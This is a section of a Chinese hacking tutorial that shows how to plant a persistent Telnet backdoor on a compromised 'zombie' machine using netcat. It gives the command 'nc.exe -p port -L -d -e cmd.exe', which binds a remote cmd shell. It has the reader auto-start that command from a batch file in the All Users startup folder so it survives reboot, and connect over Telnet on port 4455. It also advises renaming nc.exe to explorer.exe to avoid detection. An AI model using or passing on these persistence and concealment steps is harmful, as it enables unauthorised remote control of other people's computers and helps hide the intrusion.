4.1.6 利用nc构建Telnet后门控制案例
通过本案例你可以学习到:
① 通过nc来构建Telnet后门;
② 利用bat文件来启动nc后门。
nc俗称为网络中的"瑞士×××"其功能强大,如果在肉鸡上运行"nc.exe -p port -L -d -e
cmd.exe"命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个
telnet后门,当系统重新启动后,该后门会继续存在,具体操作步骤如下。
编辑一个bat文件。在IP地址为192.168.1.19的计算机上新建一个bat文件,取名为"1.bat",在其中输入以下内容,如图4-24所示。
@ |
 |
| (点击查看大图)图4-24构建一个bat文件 |
将1.bat复制到"All user"的启动文件夹。将"1.bat"文件复制到"C:\Documents and Settings\All Users\「开始」菜单\程序\启动"文件夹下,如图4-25所示。
 |
| (点击查看大图)图4-25复制1.bat文件到启动文件夹下 |
等待重启后使用Telnet连接肉鸡IP。重启计算机后,用户进入计算机后,会执行"1.bat"脚本,会启动nc程序从而开启4455端口。在本
地使用命令"telnet 192.168.1.19 4455"连接IP地址192.168.1.19
的计算机的4455端口,如图4-26所示,可以通过telnet连接肉鸡并在肉鸡上执行各种命令。
 |
| (点击查看大图)图4-26使用Telnet连接肉鸡4455端口 |
技巧
可以将nc.exe文件重新命名为其他文件,例如explorer.exe等,这样在任务管理器中看到的nc.exe变成explorer.exe了,不容易被发觉,而nc命令中加入"-L -d"后即使关闭了nc监听窗口,该命令行还继续存在。
小结
本案例通过编写bat批处理文件,并将该bat文件放在"C:\Documents and Settings\All
Users\「开始」菜单\程序\启动"文件夹下,则无论哪个用户登录,都会启动该bat文件,从而保留nc的telnet后门,该后门只要知道端口,通
过telnet程序可以直接连接。
